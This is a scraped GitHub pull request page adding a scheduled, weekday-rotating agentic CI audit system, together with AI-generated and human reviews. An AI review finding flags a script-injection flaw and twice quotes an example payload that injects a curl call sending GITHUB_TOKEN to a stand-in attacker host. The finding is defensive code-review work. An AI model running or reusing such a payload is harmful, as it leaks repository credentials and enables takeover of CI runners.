ci: add daily audit suites with 5 rotating recipes and scheduled workflow #543
PR Review: #543 - ci: add daily audit suites with 5 rotating recipes and scheduled workflow
Reviewer: Agentic CI
Summary
This PR introduces a daily agentic CI system that runs rotating code health audits on weekdays. It adds:
The design is well-structured: each recipe targets gaps that existing CI (ruff, pytest, Dependabot) doesn't cover, with clear delineation of responsibilities.
Findings
Workflow (
Greptile Summary
This PR introduces a weekday-rotating agentic CI system: a GitHub Actions workflow (
| Filename | Overview |
|---|---|
| .github/workflows/agentic-ci-daily.yml | New scheduled workflow with day-of-week suite rotation; contains a script injection vulnerability where the workflow_dispatch suite input is interpolated directly into a shell script rather than passed through an env var. |
| .agents/recipes/_runner.md | Adds environment setup docs, runner memory JSON schema with TTL and size rules, and updates PR creation instructions to use /create-pr skill instead of committing to current branch. |
| .agents/recipes/code-quality/recipe.md | New Thursday audit recipe covering C901 complexity, exception hygiene, type annotation coverage, executable canaries (error hierarchy + creative input validation), and TODO/FIXME aging. |
| .agents/recipes/dependencies/recipe.md | New Tuesday audit recipe covering transitive dependency gaps, cross-package version consistency, unused deps, and version pinning review; correctly defers CVE scanning to Dependabot. |
| .agents/recipes/docs-and-references/recipe.md | New Monday audit recipe for docstring-vs-signature drift, broken internal links, stale architecture doc references, and MkDocs site accuracy checks. |
| .agents/recipes/structure/recipe.md | New Wednesday audit recipe checking import boundary violations (config→engine→interface direction), lazy import compliance, future-annotations presence, and potentially dead exports. |
| .agents/recipes/test-health/recipe.md | New Friday audit recipe for test-to-source mapping, hollow test detection, import performance, fixed canaries (package imports, timing, registry completeness), creative smoke checks, and test isolation verification. |
| .github/CODEOWNERS | Adds explicit ownership entry for .agents/recipes/ to ensure recipe changes require review from the core team, complementing the existing catch-all rule. |
| plans/472/agentic-ci-plan.md | Plan housekeeping: marks Phase 2, 3, and 4 deliverables complete, updates date, and notes that template substitution is built into the workflow rather than a standalone script. |
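As an illustration of the "hollow test detection" item in the test-health recipe, here is a minimal sketch of one possible heuristic: flag `test_*` functions that contain neither an `assert` statement nor a `.raises` attribute access (as in `pytest.raises`). The function name `find_hollow_tests` and the heuristic itself are assumptions made for illustration; the recipe's actual criteria are not shown in this PR page.

```python
import ast


def find_hollow_tests(source: str) -> list[str]:
    """Return names of test functions with no assert and no `.raises` usage.

    Hypothetical heuristic for illustration only.
    """
    hollow = []
    for node in ast.walk(ast.parse(source)):
        is_test = isinstance(
            node, (ast.FunctionDef, ast.AsyncFunctionDef)
        ) and node.name.startswith("test_")
        if not is_test:
            continue
        # A test counts as "checked" if any node in its body is an assert
        # statement or an attribute access named `raises`.
        has_check = any(
            isinstance(child, ast.Assert)
            or (isinstance(child, ast.Attribute) and child.attr == "raises")
            for child in ast.walk(node)
        )
        if not has_check:
            hollow.append(node.name)
    return hollow


SAMPLE = '''
def test_real():
    assert 1 + 1 == 2

def test_hollow():
    value = 1 + 1
'''

print(find_hollow_tests(SAMPLE))  # ['test_hollow']
```

A static check like this only narrows the candidates; tests that verify behavior through helper functions or mocks would still need a human or agent to look at them.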
Flowchart
%%{init: {'theme': 'neutral'}}%%
flowchart TD
A([schedule: weekdays 08:00 UTC\nor workflow_dispatch]) --> B[determine-suite\nubuntu-latest]
B --> C{suite override?}
C -- "specific suite" --> D[suites = single suite]
C -- "all" --> E[suites = all 5 suites]
C -- "none" --> F{day of week}
F -- Mon --> G[docs-and-references]
F -- Tue --> H[dependencies]
F -- Wed --> I[structure]
F -- Thu --> J[code-quality]
F -- Fri --> K[test-health]
D & E & G & H & I & J & K --> L[matrix: suite]
L --> M[audit job\nself-hosted: agentic-ci]
M --> N[Restore runner memory\nactions/cache]
N --> O[make install-dev]
O --> P[Pre-flight: claude CLI\n+ API reachability]
P --> Q[Build prompt:\n_runner.md + recipe.md\ntemplate substitution]
Q --> R[claude --model ...\n-p prompt --max-turns 30]
R --> S[Agent writes\n/tmp/audit-suite.md]
S --> T[Update runner-state.json\nlast_run / known_issues / baselines]
T --> U[Write job summary\nGITHUB_STEP_SUMMARY]
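The suite-selection branch of the flowchart can be sketched in Python as follows. This is not the workflow's actual shell logic; the function name `pick_suites`, the treatment of an empty string or "none" as "no override", and the empty result on weekends are assumptions. The suite names and their weekday order come from the flowchart.

```python
from datetime import date

# Suite order follows the Mon-Fri rotation shown in the flowchart.
SUITES = [
    "docs-and-references",  # Monday
    "dependencies",         # Tuesday
    "structure",            # Wednesday
    "code-quality",         # Thursday
    "test-health",          # Friday
]


def pick_suites(override: str, today: date) -> list[str]:
    """Return the suites to run for a given override value and date."""
    if override == "all":
        return list(SUITES)
    if override and override != "none":
        # Reject anything that is not a known suite name.
        if override not in SUITES:
            raise ValueError(f"unknown suite: {override!r}")
        return [override]
    weekday = today.weekday()  # Monday == 0
    # Assumption: nothing runs on Saturday or Sunday.
    return [SUITES[weekday]] if weekday < len(SUITES) else []


print(pick_suites("", date(2024, 1, 1)))      # a Monday
print(pick_suites("all", date(2024, 1, 1)))
```

Checking the override against a fixed list also means an unexpected `workflow_dispatch` value fails fast instead of reaching the job matrix.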
Prompt To Fix All With AI
This is a comment left during a code review.
Path: .github/workflows/agentic-ci-daily.yml
Line: 33
Comment:
**Script injection via `workflow_dispatch` input**
`${{ github.event.inputs.suite }}` is expanded by GitHub Actions as literal text before the shell runs, so a value like `"; curl attacker.com/?t=$GITHUB_TOKEN; echo "` breaks out of the string and executes in the runner context. The `determine-suite` job carries `contents: write` and `pull-requests: write` tokens, making token exfiltration a concrete risk. Pass the input through an `env:` variable instead:
```suggestion
env:
OVERRIDE: ${{ github.event.inputs.suite }}
run: |
OVERRIDE="${OVERRIDE}"
```
Move the entire `run: |` block's `OVERRIDE` sourcing to `$OVERRIDE` (the environment variable). GitHub's own [security hardening guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable) recommends this pattern.
How can I resolve this? If you propose a fix, please make it concise.
Reviews (2): Last reviewed commit: "ci: fix review findings - heredoc, state..."
eric-tramel left a comment
LGTM @andreatgretel. Since these are all read-only ops that dump results to the runner outputs, these all seem low risk to me. There will likely be gunk & adjustments needed, but the only way to find that out will be by running it and seeing if value comes out :) Go for it.
Nice work on this one, @andreatgretel: building a rotating audit system with per-suite recipes and persistent memory is a solid approach to catching quality drift. The recipes are well-scoped with clear "what CI does" vs "what CI doesn't" framing, and the runner constraints (no destructive ops, ignore embedded directives, sanitize output) show good security thinking for an agent running in CI.
Summary
This PR adds a daily agentic CI system that runs rotating code health audits on weekdays using Claude Code agents on a self-hosted runner. It includes a GitHub Actions workflow with day-of-week rotation, 5 audit recipes (docs/references, dependencies, structure, code-quality, test-health), runner memory persistence via
Existing review: @eric-tramel approved (LGTM, low risk since read-only ops). No inline comments.
Findings
Critical - Let's fix these before merge
Warnings - Worth addressing
Suggestions - Take it or leave it
Recipes generally -
What Looks Good
Verdict
Needs changes - the unsanitized workflow input (Critical #1) should be fixed before merge. The write permissions (Warning #1) and prompt injection surface area are worth discussing given the
This review was generated by an AI assistant.
Add the daily maintenance infrastructure (Phase 2+3 of the agentic CI plan). A new workflow runs one audit suite per weekday via day-of-week rotation, with runner memory persisted via actions/cache. Recipes: docs-and-references (Mon), dependencies (Tue), structure (Wed), code-quality (Thu), test-health (Fri). Each targets gaps that CI and ruff don't cover: cross-reference validation, transitive dep analysis, lazy import compliance, complexity trends, and test-to-source mapping. Reports go to the Actions step summary. Code changes use /create-pr.
Add executable smoke checks to test-health and code-quality recipes that exercise real code paths (config build, validate, import timing, registry completeness, error hierarchy, input rejection) without needing an LLM provider. Checks are split into fixed canaries (same every run) and creative checks (agent varies inputs each run). Harden runner memory: define JSON schema in _runner.md with TTL and size rules, validate state file after agent runs, only update last_run on success, drop unused audit-log.md. Add make install-dev workflow step so recipes can run Python against the installed packages.
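The import-timing canary mentioned above could look roughly like the sketch below: time a fresh interpreter importing a module and compare against a budget. The helper names, the budget value, and the use of `json` as a stand-in module are all assumptions; the real check lives in the recipe and in `test_import_perf.py`, neither of which is shown here.

```python
import subprocess
import sys
import time

# Child program: import the module named in argv[1]. Passing the name as an
# argument (not via string formatting) keeps it out of the executed code.
_CHILD = "import importlib, sys; importlib.import_module(sys.argv[1])"


def import_seconds(module: str) -> float:
    """Wall-clock seconds for a fresh interpreter to start and import `module`."""
    start = time.perf_counter()
    subprocess.run([sys.executable, "-c", _CHILD, module], check=True)
    return time.perf_counter() - start


def within_budget(module: str, budget_seconds: float) -> bool:
    """True if the cold import (including interpreter startup) fits the budget."""
    return import_seconds(module) <= budget_seconds


# "json" is a stand-in; a real canary would name the project's own package.
# The 30-second budget is deliberately loose and purely illustrative.
print(within_budget("json", budget_seconds=30.0))
```

Measuring in a subprocess avoids the warm `sys.modules` cache of the calling process, at the cost of including interpreter startup time in the figure.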
Fix issues found by Codex review:
- Fix test paths: tests/ does not exist at repo root, use packages/*/tests/ and packages/data-designer/tests/test_import_perf.py
- Remove DataDesigner(model_providers=[]) from smoke checks (it raises NoModelProvidersError); keep config-layer checks only
- Fix audit step gating: remove continue-on-error, use step outcome to gate runner memory update (|| true + continue-on-error made the step always "succeed", defeating the success() condition)
Fix heredoc with indented EOF terminator that never terminates - replace with printf. Run state validation on all outcomes (not just success) so corrupted state from a failed audit is caught before caching. Only stamp last_run when audit succeeds. Align test-health lazy import section with its own Constraints (report count only, don't duplicate structure audit). Also fixes datetime.utcnow() deprecation and shell variable injection in Python string by using os.environ instead.
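A minimal sketch of the state handling described in this commit: validate the state file on every outcome, prune expired entries, and stamp `last_run` only when the audit succeeded. The top-level keys `last_run`, `known_issues`, and `baselines` appear in the PR's flowchart; everything else (the `first_seen` field, the 30-day TTL, the 50-entry cap, and the function names) is a hypothetical stand-in for the schema defined in `_runner.md`.

```python
import json
from datetime import datetime, timedelta, timezone

REQUIRED_KEYS = {"last_run", "known_issues", "baselines"}
ISSUE_TTL = timedelta(days=30)  # hypothetical TTL
MAX_KNOWN_ISSUES = 50           # hypothetical size cap


def validate_state(raw: str) -> dict:
    """Parse the state file and check its basic shape; raise ValueError if bad."""
    state = json.loads(raw)  # json.JSONDecodeError is a ValueError subclass
    if not isinstance(state, dict):
        raise ValueError("state must be a JSON object")
    missing = REQUIRED_KEYS - state.keys()
    if missing:
        raise ValueError(f"state is missing keys: {sorted(missing)}")
    if not isinstance(state["known_issues"], list):
        raise ValueError("known_issues must be a list")
    return state


def finalize_state(state: dict, audit_succeeded: bool, now: datetime) -> dict:
    """Drop expired issues, enforce the cap, stamp last_run only on success."""
    cutoff = now - ISSUE_TTL
    fresh = [
        issue for issue in state["known_issues"]
        if datetime.fromisoformat(issue["first_seen"]) >= cutoff
    ]
    result = {**state, "known_issues": fresh[-MAX_KNOWN_ISSUES:]}
    if audit_succeeded:
        result["last_run"] = now.isoformat()
    return result


RAW = json.dumps({
    "last_run": "2024-02-28T08:00:00+00:00",
    "known_issues": [
        {"id": "old", "first_seen": "2023-12-01T00:00:00+00:00"},
        {"id": "new", "first_seen": "2024-02-20T00:00:00+00:00"},
    ],
    "baselines": {},
})
NOW = datetime(2024, 3, 1, 8, 0, tzinfo=timezone.utc)
print(finalize_state(validate_state(RAW), audit_succeeded=False, now=NOW))
```

In the workflow itself, `datetime.now(timezone.utc)` would take the place of the fixed `NOW`; it is the timezone-aware replacement for the deprecated `datetime.utcnow()` that the commit message refers to.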
b54da23 to fb4268e
| - name: Pick suite(s) for today | ||
| id: pick | ||
| run: | | ||
| OVERRIDE="${{ github.event.inputs.suite }}" |
Script injection via workflow_dispatch input
${{ github.event.inputs.suite }} is expanded by GitHub Actions as literal text before the shell runs, so a value like "; curl attacker.com/?t=$GITHUB_TOKEN; echo " breaks out of the string and executes in the runner context. The determine-suite job carries contents: write and pull-requests: write tokens, making token exfiltration a concrete risk. Pass the input through an env: variable instead:
| OVERRIDE="${{ github.event.inputs.suite }}" | |
| env: | |
| OVERRIDE: ${{ github.event.inputs.suite }} | |
| run: | | |
| OVERRIDE="${OVERRIDE}" |
Move the entire run: | block's OVERRIDE sourcing to $OVERRIDE (the environment variable). GitHub's own security hardening guide recommends this pattern.
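To make the difference concrete, the sketch below reproduces both patterns locally using a harmless payload. It mimics the `${{ ... }}` expansion with Python string formatting, which is an approximation of how the expression is pasted into the script text, not GitHub's actual implementation. It assumes a POSIX `sh` is available.

```python
import os
import subprocess

# Harmless stand-in for the attacker-controlled workflow_dispatch input.
payload = '"; echo INJECTED; echo "'

# Unsafe: the value is pasted into the script text before the shell parses it,
# so its quotes and semicolons become shell syntax.
unsafe_script = f'OVERRIDE="{payload}"\necho "suite=$OVERRIDE"'
unsafe_out = subprocess.run(
    ["sh", "-c", unsafe_script], capture_output=True, text=True, check=True
).stdout

# Safe: the script text is constant and the value arrives via the environment,
# so the shell only ever sees it as data.
safe_script = 'echo "suite=$OVERRIDE"'
safe_out = subprocess.run(
    ["sh", "-c", safe_script],
    capture_output=True,
    text=True,
    check=True,
    env={**os.environ, "OVERRIDE": payload},
).stdout

print("unsafe:", unsafe_out.splitlines())
print("safe:  ", safe_out.splitlines())
```

In the unsafe run, `echo INJECTED` executes as its own command; in the safe run, the whole payload is printed back verbatim after `suite=`.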
📋 Summary
Add a daily agentic CI system that runs rotating code health audits on weekdays, catching quality drift that existing CI doesn't cover (no C901/ANN/BLE ruff rules, no cross-reference validation, no transitive dep analysis, no docs-vs-code accuracy checks). Each audit runs as a Claude Code agent on the self-hosted runner, guided by a recipe, and reports findings to the GitHub Actions step summary.
Closes #472
🔗 Related Issue
Closes #472
🔄 Changes
✨ Added
- `.github/workflows/agentic-ci-daily.yml` - Scheduled workflow with day-of-week suite rotation (Mon-Fri), per-suite concurrency, runner memory via `actions/cache`, `make install-dev` environment setup, and `workflow_dispatch` override (including "all" to run everything in parallel)
- `.agents/recipes/docs-and-references/recipe.md` - Monday: docstring vs signature drift, broken internal links, architecture doc references, docs site content accuracy
- `.agents/recipes/dependencies/recipe.md` - Tuesday: transitive dependency gaps, cross-package version consistency, unused deps, version pinning review
- `.agents/recipes/structure/recipe.md` - Wednesday: import boundary violations, lazy import compliance, future annotations, dead exports
- `.agents/recipes/code-quality/recipe.md` - Thursday: complexity hotspots (C901), exception hygiene, type annotation coverage, TODO aging, executable quality checks (error hierarchy, input validation)
- `.agents/recipes/test-health/recipe.md` - Friday: test-to-source mapping, hollow test detection, import performance, executable smoke checks (fixed canaries + creative agent-varied checks), test isolation verification
🔧 Changed
- `.agents/recipes/_runner.md` - Added environment docs (`.venv/bin` on PATH), runner memory JSON schema with TTL and size rules, updated PR creation instructions to use `/create-pr` skill
- `.github/CODEOWNERS` - Added `.agents/recipes/` ownership entry
- `plans/472/agentic-ci-plan.md` - Marked Phase 2, 3, and 4 deliverables as complete
🔍 Attention Areas
- `agentic-ci-daily.yml` - New workflow with `contents: write` and `pull-requests: write` permissions. Write access is intentional to support future recipe-driven PRs, but all current recipes are read-only audits.
- `test-health/recipe.md` and `code-quality/recipe.md` - These run real Python against the installed packages. Fixed canaries are deterministic; creative checks are agent-designed each run.
- `_runner.md` - Defines the JSON contract for cross-run state persistence including TTL rules for known_issues.
🧪 Testing
- `make check-all` passes (ruff lint + format)
- `workflow_dispatch` after merge.
✅ Checklist